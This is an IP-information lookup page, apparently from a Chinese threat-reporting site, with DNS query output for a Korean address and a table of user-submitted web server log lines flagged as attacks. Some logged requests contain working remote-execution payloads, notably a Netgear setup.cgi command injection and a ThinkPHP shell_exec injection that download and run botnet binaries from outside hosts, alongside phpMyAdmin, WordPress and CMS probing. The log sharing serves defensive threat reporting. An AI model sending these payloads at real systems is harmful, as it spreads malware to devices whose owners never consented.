125.176.97.149

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Korea (the Republic of)

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 125.176.97.149
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 28338
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;125.176.97.149.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025022001 1800 900 604800 86400

;; Query time: 9 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 21 02:58:41 CST 2025
;; MSG SIZE  rcvd: 107

HOST信息:

Host 149.97.176.125.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 149.97.176.125.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
139.59.23.231	attack	139.59.23.231 - - [12/Apr/2019:08:13:30 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" 139.59.23.231 - - [12/Apr/2019:08:13:30 +0800] "GET /phpMyAdmin/ HTTP/1.1" 301 194 "-" "ZmEu" 139.59.23.231 - - [12/Apr/2019:08:13:30 +0800] "GET /phpmyadmin/ HTTP/1.1" 301 194 "-" "ZmEu"	2019-04-12 08:15:40
116.255.152.176	attack	116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //ysy.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //ysy.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//ysy.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //lequ.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "GET //lequ.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:15 +0800] "POST //plus/laobiao.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //plus/laobiao.php HTTP/1.1" 404 232 "http://ipinfo.asytech.cn//plus/laobiao.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //3G.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "GET //3G.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//3G.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.152.176 - - [10/Apr/2019:10:26:16 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 194 "http://ipinfo.asytech.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"	2019-04-10 10:27:18
42.86.95.59	bots	42.86.95.59 - - [18/Apr/2019:10:45:19 +0800] "GET /otsmobile/app/mds/mgw.htm HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"	2019-04-18 10:46:06
46.229.206.135	attack	46.229.206.135 - - [10/Apr/2019:08:58:54 +0800] "POST https://www.eznewstoday.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.eznewstoday.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 7150 "https://www.eznewstoday.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.eznewstoday.com%2Fwp-admin%2F&reauth=1" "Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.90.37 (KHTML, like Gecko) Version/5.3.8 Safari/531.73"	2019-04-10 09:00:42
120.92.90.154	botsattack	120.92.90.154 - - [17/Apr/2019:00:04:34 +0000] "POST /public/index.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0" 120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "GET /public/gqxuracc.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0" 120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "POST /public/index.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0" 120.92.90.154 - - [17/Apr/2019:00:04:35 +0000] "GET /public/gqxuracc.php HTTP/1.1" 404 15604 "-" "python-requests/2.21.0"	2019-04-17 08:12:27
101.226.114.193	attack	101.226.114.193 - - [13/Apr/2019:13:01:15 +0800] "GET /zuos.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.114.193 - - [13/Apr/2019:13:01:15 +0800] "GET /zuos.php HTTP/1.1" 404 209 "http://118.25.52.138/zuos.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.227.151.57 - - [13/Apr/2019:13:01:16 +0800] "GET /MCLi.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.227.151.57 - - [13/Apr/2019:13:01:16 +0800] "GET /MCLi.php HTTP/1.1" 404 209 "http://118.25.52.138/MCLi.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"	2019-04-13 13:01:46
123.249.7.34	attack	123.249.7.34 - - [12/Apr/2019:02:27:37 +0800] "POST /uploads/dede/sys_verifies.php?action=down HTTP/1.1" 301 194 "http://ipinfo.asytech.cn/uploads/dede/sys_verifies.php?action=down" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 123.249.7.34 - - [12/Apr/2019:02:27:37 +0800] "POST /index.php/api/Uploadify/preview HTTP/1.1" 301 194 "http://ipinfo.asytech.cn/index.php/api/Uploadify/preview" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"	2019-04-12 06:28:14
151.16.139.97	attack	151.16.139.97 - - [11/Apr/2019:12:19:15 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://134.209.212.247/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-" 151.16.139.97 - - [11/Apr/2019:12:19:18 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://134.209.212.247/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-"	2019-04-11 12:20:22
89.248.172.90	proxy	89.248.172.90 - - [17/Apr/2019:14:10:41 +0800] "CONNECT dnspod.qcloud.com:443 HTTP/1.1" 405 519 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)"	2019-04-17 15:15:55
118.25.49.95	attack	118.25.49.95 - - [08/Apr/2019:17:56:10 +0800] "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 400 682 "http://118.25.52.138:443/struts2-rest-showcase/orders.xhtml" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [08/Apr/2019:17:56:10 +0800] "GET /index.action HTTP/1.1" 400 682 "http://118.25.52.138:443/index.action" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [08/Apr/2019:17:56:10 +0800] "GET /index.do HTTP/1.1" 400 682 "http://118.25.52.138:443/index.do" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"	2019-04-08 17:57:55
61.86.79.193	attack	61.86.79.193 - - [11/Apr/2019:07:03:06 +0800] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.13 1/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' HTTP/1.1" 400 182 "-" "Akari(selfrep)"	2019-04-11 07:13:26
1.20.151.73	attack	1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpMyAdmins/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0 .2623.105 Safari/537.36" 1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpMyAdmin._/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49. 0.2623.105 Safari/537.36" 1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /phpmyadmin2222/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4 9.0.2623.105 Safari/537.36" 1.20.151.73 - - [13/Apr/2019:04:10:01 +0800] "GET /php2MyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0 .2623.105 Safari/537.36"	2019-04-13 06:21:32
172.245.184.232	attack	172.245.184.232 - - [16/Apr/2019:16:17:39 +0800] "GET /Public/Wchat/js/cvphp.js HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"	2019-04-16 16:19:38
113.237.176.72	attack	113.237.176.72 - - [12/Apr/2019:13:28:32 +0800] "GET /mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B\\x22train_date\\x22%3A\\x2220181231\\x22%2C\\x22purpose_codes\\x22%3A\\x2200\\x22%2C\\x22from_station\\x22%3A\\x22BJP\\x22%2C\\x22to_station\\x22%3A\\x22SHH\\x22%2C\\x22station_train_code\\x22%3A\\x22\\x22%2C\\x22start_time_begin\\x22%3A\\x220000\\x22%2C\\x22start_time_end\\x22%3A\\x222400\\x22%2C\\x22train_headers\\x22%3A\\x22QB%23\\x22%2C\\x22train_flag\\x22%3A\\x22\\x22%2C\\x22seat_type\\x22%3A\\x220\\x22%2C\\x22seatBack_Type\\x22%3A\\x22\\x22%2C\\x22ticket_num\\x22%3A\\x22\\x22%2C\\x22dfpStr\\x22%3A\\x22\\x22%2C\\x22baseDTO\\x22%3A%7B\\x22check_code\\x22%3A\\x22d38a201f2de926ce0686aedfdcf2de68\\x22%2C\\x22device_no\\x22%3A\\x22WtaHBzID7ZQDADJh05y5LLpd\\x22%2C\\x22mobile_no\\x22%3A\\x22\\x22%2C\\x22os_type\\x22%3A\\x22a\\x22%2C\\x22time_str\\x22%3A\\x2220181030152947\\x22%2C\\x22version_no\\x22%3A\\x224.1.9\\x22%7D%7D%5D&ts=1540884587652&sign=37b8ebe6406579e4fb2ac8c9038eab37 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"	2019-04-12 13:29:24
54.242.155.91	attack	54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET HTTP/1.1" 400 182 "-" "-"	2019-04-14 19:37:25

最近上报的IP列表

226.226.8.37	181.39.35.224	74.27.146.223	32.4.117.190
203.71.162.139	178.154.200.208	16.71.117.106	164.170.108.41
71.13.196.190	59.254.255.102	173.189.173.125	101.183.6.64
57.220.208.83	172.126.91.104	6.102.92.145	154.20.119.172
5.16.231.35	212.234.63.54	160.200.221.135	52.114.223.130